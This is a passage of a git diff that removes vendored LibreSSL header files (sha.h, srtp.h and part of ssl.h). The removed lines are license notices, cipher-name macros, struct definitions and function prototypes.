-#define U64(C)     C##ULL
-#endif
-
-typedef struct SHA512state_st
-	{
-	SHA_LONG64 h[8];
-	SHA_LONG64 Nl,Nh;
-	union {
-		SHA_LONG64	d[SHA_LBLOCK];
-		unsigned char	p[SHA512_CBLOCK];
-	} u;
-	unsigned int num,md_len;
-	} SHA512_CTX;
-#endif
-
-#ifndef OPENSSL_NO_SHA512
-int SHA384_Init(SHA512_CTX *c);
-int SHA384_Update(SHA512_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA384_Final(unsigned char *md, SHA512_CTX *c);
-unsigned char *SHA384(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-int SHA512_Init(SHA512_CTX *c);
-int SHA512_Update(SHA512_CTX *c, const void *data, size_t len)
-	__attribute__ ((__bounded__(__buffer__,2,3)));
-int SHA512_Final(unsigned char *md, SHA512_CTX *c);
-unsigned char *SHA512(const unsigned char *d, size_t n,unsigned char *md)
-	__attribute__ ((__bounded__(__buffer__,1,2)));
-void SHA512_Transform(SHA512_CTX *c, const unsigned char *data);
-#endif
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/srtp.h b/thirdparty/libressl/include/openssl/srtp.h
deleted file mode 100644
index 6daa02a..0000000
--- a/thirdparty/libressl/include/openssl/srtp.h
+++ /dev/null
@@ -1,142 +0,0 @@
-/* $OpenBSD: srtp.h,v 1.6 2015/09/01 15:18:23 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/*
- * DTLS code by Eric Rescorla <ekr@rtfm.com>
- *
- * Copyright (C) 2006, Network Resonance, Inc.
- * Copyright (C) 2011, RTFM, Inc.
- */
-
-#ifndef HEADER_D1_SRTP_H
-#define HEADER_D1_SRTP_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#define SRTP_AES128_CM_SHA1_80 0x0001
-#define SRTP_AES128_CM_SHA1_32 0x0002
-#define SRTP_AES128_F8_SHA1_80 0x0003
-#define SRTP_AES128_F8_SHA1_32 0x0004
-#define SRTP_NULL_SHA1_80      0x0005
-#define SRTP_NULL_SHA1_32      0x0006
-
-int SSL_CTX_set_tlsext_use_srtp(SSL_CTX *ctx, const char *profiles);
-int SSL_set_tlsext_use_srtp(SSL *ctx, const char *profiles);
-
-STACK_OF(SRTP_PROTECTION_PROFILE) *SSL_get_srtp_profiles(SSL *ssl);
-SRTP_PROTECTION_PROFILE *SSL_get_selected_srtp_profile(SSL *s);
-
-#ifdef  __cplusplus
-}
-#endif
-
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl.h b/thirdparty/libressl/include/openssl/ssl.h
deleted file mode 100644
index d431b17..0000000
--- a/thirdparty/libressl/include/openssl/ssl.h
+++ /dev/null
@@ -1,2067 +0,0 @@
-/* $OpenBSD: ssl.h,v 1.134 2017/08/30 16:24:21 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECC cipher suite support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-/* ====================================================================
- * Copyright 2005 Nokia. All rights reserved.
- *
- * The portions of the attached software ("Contribution") is developed by
- * Nokia Corporation and is licensed pursuant to the OpenSSL open source
- * license.
- *
- * The Contribution, originally written by Mika Kousa and Pasi Eronen of
- * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
- * support (see RFC 4279) to OpenSSL.
- *
- * No patent licenses or other rights except those expressly stated in
- * the OpenSSL open source license shall be deemed granted or received
- * expressly, by implication, estoppel, or otherwise.
- *
- * No assurances are provided by Nokia that the Contribution does not
- * infringe the patent or other intellectual property rights of any third
- * party or that the license provides you with all the necessary rights
- * to make use of the Contribution.
- *
- * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
- * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
- * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
- * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
- * OTHERWISE.
- */
-
-#ifndef HEADER_SSL_H
-#define HEADER_SSL_H
-
-#include <stdint.h>
-
-#include <openssl/opensslconf.h>
-#include <openssl/hmac.h>
-#include <openssl/pem.h>
-#include <openssl/safestack.h>
-
-#include <openssl/bio.h>
-
-#ifndef OPENSSL_NO_DEPRECATED
-#include <openssl/buffer.h>
-#include <openssl/crypto.h>
-#include <openssl/lhash.h>
-
-#ifndef OPENSSL_NO_X509
-#include <openssl/x509.h>
-#endif
-#endif
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* SSLeay version number for ASN.1 encoding of the session information */
-/* Version 0 - initial version
- * Version 1 - added the optional peer certificate
- */
-#define SSL_SESSION_ASN1_VERSION 0x0001
-
-/* text strings for the ciphers */
-#define SSL_TXT_NULL_WITH_MD5		SSL2_TXT_NULL_WITH_MD5
-#define SSL_TXT_RC4_128_WITH_MD5	SSL2_TXT_RC4_128_WITH_MD5
-#define SSL_TXT_RC4_128_EXPORT40_WITH_MD5 SSL2_TXT_RC4_128_EXPORT40_WITH_MD5
-#define SSL_TXT_RC2_128_CBC_WITH_MD5	SSL2_TXT_RC2_128_CBC_WITH_MD5
-#define SSL_TXT_RC2_128_CBC_EXPORT40_WITH_MD5 SSL2_TXT_RC2_128_CBC_EXPORT40_WITH_MD5
-#define SSL_TXT_IDEA_128_CBC_WITH_MD5	SSL2_TXT_IDEA_128_CBC_WITH_MD5
-#define SSL_TXT_DES_64_CBC_WITH_MD5	SSL2_TXT_DES_64_CBC_WITH_MD5
-#define SSL_TXT_DES_64_CBC_WITH_SHA	SSL2_TXT_DES_64_CBC_WITH_SHA
-#define SSL_TXT_DES_192_EDE3_CBC_WITH_MD5 SSL2_TXT_DES_192_EDE3_CBC_WITH_MD5
-#define SSL_TXT_DES_192_EDE3_CBC_WITH_SHA SSL2_TXT_DES_192_EDE3_CBC_WITH_SHA
-
-/*    VRS Additional Kerberos5 entries
- */
-#define SSL_TXT_KRB5_DES_64_CBC_SHA   SSL3_TXT_KRB5_DES_64_CBC_SHA
-#define SSL_TXT_KRB5_DES_192_CBC3_SHA SSL3_TXT_KRB5_DES_192_CBC3_SHA
-#define SSL_TXT_KRB5_RC4_128_SHA      SSL3_TXT_KRB5_RC4_128_SHA
-#define SSL_TXT_KRB5_IDEA_128_CBC_SHA SSL3_TXT_KRB5_IDEA_128_CBC_SHA
-#define SSL_TXT_KRB5_DES_64_CBC_MD5   SSL3_TXT_KRB5_DES_64_CBC_MD5
-#define SSL_TXT_KRB5_DES_192_CBC3_MD5 SSL3_TXT_KRB5_DES_192_CBC3_MD5
-#define SSL_TXT_KRB5_RC4_128_MD5      SSL3_TXT_KRB5_RC4_128_MD5
-#define SSL_TXT_KRB5_IDEA_128_CBC_MD5 SSL3_TXT_KRB5_IDEA_128_CBC_MD5
-
-#define SSL_TXT_KRB5_DES_40_CBC_SHA   SSL3_TXT_KRB5_DES_40_CBC_SHA
-#define SSL_TXT_KRB5_RC2_40_CBC_SHA   SSL3_TXT_KRB5_RC2_40_CBC_SHA
-#define SSL_TXT_KRB5_RC4_40_SHA	      SSL3_TXT_KRB5_RC4_40_SHA
-#define SSL_TXT_KRB5_DES_40_CBC_MD5   SSL3_TXT_KRB5_DES_40_CBC_MD5
-#define SSL_TXT_KRB5_RC2_40_CBC_MD5   SSL3_TXT_KRB5_RC2_40_CBC_MD5
-#define SSL_TXT_KRB5_RC4_40_MD5	      SSL3_TXT_KRB5_RC4_40_MD5
-
-#define SSL_TXT_KRB5_DES_40_CBC_SHA   SSL3_TXT_KRB5_DES_40_CBC_SHA
-#define SSL_TXT_KRB5_DES_40_CBC_MD5   SSL3_TXT_KRB5_DES_40_CBC_MD5
-#define SSL_TXT_KRB5_DES_64_CBC_SHA   SSL3_TXT_KRB5_DES_64_CBC_SHA
-#define SSL_TXT_KRB5_DES_64_CBC_MD5   SSL3_TXT_KRB5_DES_64_CBC_MD5
-#define SSL_TXT_KRB5_DES_192_CBC3_SHA SSL3_TXT_KRB5_DES_192_CBC3_SHA
-#define SSL_TXT_KRB5_DES_192_CBC3_MD5 SSL3_TXT_KRB5_DES_192_CBC3_MD5
-#define SSL_MAX_KRB5_PRINCIPAL_LENGTH  256
-
-#define SSL_MAX_SSL_SESSION_ID_LENGTH		32
-#define SSL_MAX_SID_CTX_LENGTH			32
-
-#define SSL_MIN_RSA_MODULUS_LENGTH_IN_BYTES	(512/8)
-#define SSL_MAX_KEY_ARG_LENGTH			8
-#define SSL_MAX_MASTER_KEY_LENGTH		48
-
-
-/* These are used to specify which ciphers to use and not to use */
-
-#define SSL_TXT_LOW		"LOW"
-#define SSL_TXT_MEDIUM		"MEDIUM"
-#define SSL_TXT_HIGH		"HIGH"
-
-#define SSL_TXT_kFZA		"kFZA" /* unused! */
-#define	SSL_TXT_aFZA		"aFZA" /* unused! */
-#define SSL_TXT_eFZA		"eFZA" /* unused! */
-#define SSL_TXT_FZA		"FZA"  /* unused! */
-
-#define	SSL_TXT_aNULL		"aNULL"
-#define	SSL_TXT_eNULL		"eNULL"
-#define	SSL_TXT_NULL		"NULL"
-
-#define SSL_TXT_kRSA		"kRSA"
-#define SSL_TXT_kDHr		"kDHr" /* no such ciphersuites supported! */
-#define SSL_TXT_kDHd		"kDHd" /* no such ciphersuites supported! */
-#define SSL_TXT_kDH 		"kDH"  /* no such ciphersuites supported! */
-#define SSL_TXT_kEDH		"kEDH"
-#define SSL_TXT_kKRB5     	"kKRB5"
-#define SSL_TXT_kECDHr		"kECDHr"
-#define SSL_TXT_kECDHe		"kECDHe"
-#define SSL_TXT_kECDH		"kECDH"
-#define SSL_TXT_kEECDH		"kEECDH"
-#define SSL_TXT_kPSK            "kPSK"
-#define SSL_TXT_kGOST		"kGOST"
-#define SSL_TXT_kSRP		"kSRP"
-
-#define	SSL_TXT_aRSA		"aRSA"
-#define	SSL_TXT_aDSS		"aDSS"
-#define	SSL_TXT_aDH		"aDH" /* no such ciphersuites supported! */
-#define	SSL_TXT_aECDH		"aECDH"
-#define SSL_TXT_aKRB5     	"aKRB5"
-#define SSL_TXT_aECDSA		"aECDSA"
-#define SSL_TXT_aPSK            "aPSK"
-#define SSL_TXT_aGOST94		"aGOST94"
-#define SSL_TXT_aGOST01		"aGOST01"
-#define SSL_TXT_aGOST		"aGOST"
-
-#define	SSL_TXT_DSS		"DSS"
-#define SSL_TXT_DH		"DH"
-#define SSL_TXT_DHE		"DHE" /* same as "kDHE:-ADH" */
-#define SSL_TXT_EDH		"EDH" /* previous name for DHE */
-#define SSL_TXT_ADH		"ADH"
-#define SSL_TXT_RSA		"RSA"
-#define SSL_TXT_ECDH		"ECDH"
-#define SSL_TXT_ECDHE		"ECDHE" /* same as "kECDHE:-AECDH" */
-#define SSL_TXT_EECDH		"EECDH" /* previous name for ECDHE */
-#define SSL_TXT_AECDH		"AECDH"
-#define SSL_TXT_ECDSA		"ECDSA"
-#define SSL_TXT_KRB5      	"KRB5"
-#define SSL_TXT_PSK             "PSK"
-#define SSL_TXT_SRP		"SRP"
-
-#define SSL_TXT_DES		"DES"
-#define SSL_TXT_3DES		"3DES"
-#define SSL_TXT_RC4		"RC4"
-#define SSL_TXT_RC2		"RC2"
-#define SSL_TXT_IDEA		"IDEA"
-#define SSL_TXT_SEED		"SEED"
-#define SSL_TXT_AES128		"AES128"
-#define SSL_TXT_AES256		"AES256"
-#define SSL_TXT_AES		"AES"
-#define SSL_TXT_AES_GCM		"AESGCM"
-#define SSL_TXT_CAMELLIA128	"CAMELLIA128"
-#define SSL_TXT_CAMELLIA256	"CAMELLIA256"
-#define SSL_TXT_CAMELLIA	"CAMELLIA"
-#define SSL_TXT_CHACHA20	"CHACHA20"
-
-#define SSL_TXT_AEAD		"AEAD"
-#define SSL_TXT_MD5		"MD5"
-#define SSL_TXT_SHA1		"SHA1"
-#define SSL_TXT_SHA		"SHA" /* same as "SHA1" */
-#define SSL_TXT_GOST94		"GOST94"
-#define SSL_TXT_GOST89MAC		"GOST89MAC"
-#define SSL_TXT_SHA256		"SHA256"
-#define SSL_TXT_SHA384		"SHA384"
-#define SSL_TXT_STREEBOG256		"STREEBOG256"
-#define SSL_TXT_STREEBOG512		"STREEBOG512"
-
-#define SSL_TXT_DTLS1		"DTLSv1"
-#define SSL_TXT_SSLV2		"SSLv2"
-#define SSL_TXT_SSLV3		"SSLv3"
-#define SSL_TXT_TLSV1		"TLSv1"
-#define SSL_TXT_TLSV1_1		"TLSv1.1"
-#define SSL_TXT_TLSV1_2		"TLSv1.2"
-
-#define SSL_TXT_EXP		"EXP"
-#define SSL_TXT_EXPORT		"EXPORT"
-
-#define SSL_TXT_ALL		"ALL"
-
-/*
- * COMPLEMENTOF* definitions. These identifiers are used to (de-select)
- * ciphers normally not being used.
- * Example: "RC4" will activate all ciphers using RC4 including ciphers
- * without authentication, which would normally disabled by DEFAULT (due
- * the "!ADH" being part of default). Therefore "RC4:!COMPLEMENTOFDEFAULT"
- * will make sure that it is also disabled in the specific selection.
- * COMPLEMENTOF* identifiers are portable between version, as adjustments
- * to the default cipher setup will also be included here.
- *
- * COMPLEMENTOFDEFAULT does not experience the same special treatment that
- * DEFAULT gets, as only selection is being done and no sorting as needed
- * for DEFAULT.
- */
-#define SSL_TXT_CMPALL		"COMPLEMENTOFALL"
-#define SSL_TXT_CMPDEF		"COMPLEMENTOFDEFAULT"
-
-/* The following cipher list is used by default.
- * It also is substituted when an application-defined cipher list string
- * starts with 'DEFAULT'. */
-#define SSL_DEFAULT_CIPHER_LIST	"ALL:!aNULL:!eNULL:!SSLv2"
-/* As of OpenSSL 1.0.0, ssl_create_cipher_list() in ssl/ssl_ciph.c always
- * starts with a reasonable order, and all we have to do for DEFAULT is
- * throwing out anonymous and unencrypted ciphersuites!
- * (The latter are not actually enabled by ALL, but "ALL:RSA" would enable
- * some of them.)
- */
-
-/* Used in SSL_set_shutdown()/SSL_get_shutdown(); */
-#define SSL_SENT_SHUTDOWN	1
-#define SSL_RECEIVED_SHUTDOWN	2
-
-
-#define SSL_FILETYPE_ASN1	X509_FILETYPE_ASN1
-#define SSL_FILETYPE_PEM	X509_FILETYPE_PEM
-
-/* This is needed to stop compilers complaining about the
- * 'struct ssl_st *' function parameters used to prototype callbacks
- * in SSL_CTX. */
-typedef struct ssl_st *ssl_crock_st;
-
-typedef struct tls_session_ticket_ext_st TLS_SESSION_TICKET_EXT;
-typedef struct ssl_method_st SSL_METHOD;
-typedef struct ssl_cipher_st SSL_CIPHER;
-typedef struct ssl_session_st SSL_SESSION;
-
-DECLARE_STACK_OF(SSL_CIPHER)
-
-/* SRTP protection profiles for use with the use_srtp extension (RFC 5764)*/
-typedef struct srtp_protection_profile_st {
-	const char *name;
-	unsigned long id;
-} SRTP_PROTECTION_PROFILE;
-
-DECLARE_STACK_OF(SRTP_PROTECTION_PROFILE)
-
-typedef int (*tls_session_ticket_ext_cb_fn)(SSL *s, const unsigned char *data,
-    int len, void *arg);
-typedef int (*tls_session_secret_cb_fn)(SSL *s, void *secret, int *secret_len,
-    STACK_OF(SSL_CIPHER) *peer_ciphers, SSL_CIPHER **cipher, void *arg);
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-/* used to hold info on the particular ciphers used */
-struct ssl_cipher_st {
-	int valid;
-	const char *name;		/* text name */
-	unsigned long id;		/* id, 4 bytes, first is version */
-
-	unsigned long algorithm_mkey;	/* key exchange algorithm */
-	unsigned long algorithm_auth;	/* server authentication */
-	unsigned long algorithm_enc;	/* symmetric encryption */
-	unsigned long algorithm_mac;	/* symmetric authentication */
-	unsigned long algorithm_ssl;	/* (major) protocol version */
-
-	unsigned long algo_strength;	/* strength and export flags */
-	unsigned long algorithm2;	/* Extra flags */
-	int strength_bits;		/* Number of bits really used */
-	int alg_bits;			/* Number of bits for algorithm */
-};
-
-
-/* Used to hold functions for SSLv3/TLSv1 functions */
-struct ssl_method_internal_st;
-
-struct ssl_method_st {
-	int (*ssl_dispatch_alert)(SSL *s);
-	int (*num_ciphers)(void);
-	const SSL_CIPHER *(*get_cipher)(unsigned ncipher);
-	const SSL_CIPHER *(*get_cipher_by_char)(const unsigned char *ptr);
-	int (*put_cipher_by_char)(const SSL_CIPHER *cipher, unsigned char *ptr);
-
-	const struct ssl_method_internal_st *internal;
-};
-
-/* Lets make this into an ASN.1 type structure as follows
- * SSL_SESSION_ID ::= SEQUENCE {
- *	version 		INTEGER,	-- structure version number
- *	SSLversion 		INTEGER,	-- SSL version number
- *	Cipher 			OCTET STRING,	-- the 3 byte cipher ID
- *	Session_ID 		OCTET STRING,	-- the Session ID
- *	Master_key 		OCTET STRING,	-- the master key
- *	KRB5_principal		OCTET STRING	-- optional Kerberos principal
- *	Time [ 1 ] EXPLICIT	INTEGER,	-- optional Start Time
- *	Timeout [ 2 ] EXPLICIT	INTEGER,	-- optional Timeout ins seconds
- *	Peer [ 3 ] EXPLICIT	X509,		-- optional Peer Certificate
- *	Session_ID_context [ 4 ] EXPLICIT OCTET STRING,   -- the Session ID context
- *	Verify_result [ 5 ] EXPLICIT INTEGER,   -- X509_V_... code for `Peer'
- *	HostName [ 6 ] EXPLICIT OCTET STRING,   -- optional HostName from servername TLS extension
- *	PSK_identity_hint [ 7 ] EXPLICIT OCTET STRING, -- optional PSK identity hint
- *	PSK_identity [ 8 ] EXPLICIT OCTET STRING,  -- optional PSK identity
- *	Ticket_lifetime_hint [9] EXPLICIT INTEGER, -- server's lifetime hint for session ticket
- *	Ticket [10]             EXPLICIT OCTET STRING, -- session ticket (clients only)
- *	Compression_meth [11]   EXPLICIT OCTET STRING, -- optional compression method
- *	SRP_username [ 12 ] EXPLICIT OCTET STRING -- optional SRP username
- *	}
- * Look in ssl/ssl_asn1.c for more details
- * I'm using EXPLICIT tags so I can read the damn things using asn1parse :-).
- */
-struct ssl_session_internal_st;
-
-struct ssl_session_st {
-	int ssl_version;	/* what ssl version session info is
-				 * being kept in here? */
-
-	int master_key_length;
-	unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
-
-	/* session_id - valid? */
-	unsigned int session_id_length;
-	unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
-
-	/* this is used to determine whether the session is being reused in
-	 * the appropriate context. It is up to the application to set this,
-	 * via SSL_new */
-	unsigned int sid_ctx_length;
-	unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
-
-	/* This is the cert for the other end. */
-	X509 *peer;
-
-	/* when app_verify_callback accepts a session where the peer's certificate
-	 * is not ok, we must remember the error for session reuse: */
-	long verify_result; /* only for servers */
-
-	long timeout;
-	time_t time;
-	int references;
-
-	const SSL_CIPHER *cipher;
-	unsigned long cipher_id;	/* when ASN.1 loaded, this
-					 * needs to be used to load
-					 * the 'cipher' structure */
-
-	STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
-
-	char *tlsext_hostname;
-
-	/* RFC4507 info */
-	unsigned char *tlsext_tick;	/* Session ticket */
-	size_t tlsext_ticklen;		/* Session ticket length */
-	long tlsext_tick_lifetime_hint;	/* Session lifetime hint in seconds */
-
-	struct ssl_session_internal_st *internal;
-};
-
-#endif
-
-/* Allow initial connection to servers that don't support RI */
-#define SSL_OP_LEGACY_SERVER_CONNECT			0x00000004L
-
-/* Disable SSL 3.0/TLS 1.0 CBC vulnerability workaround that was added
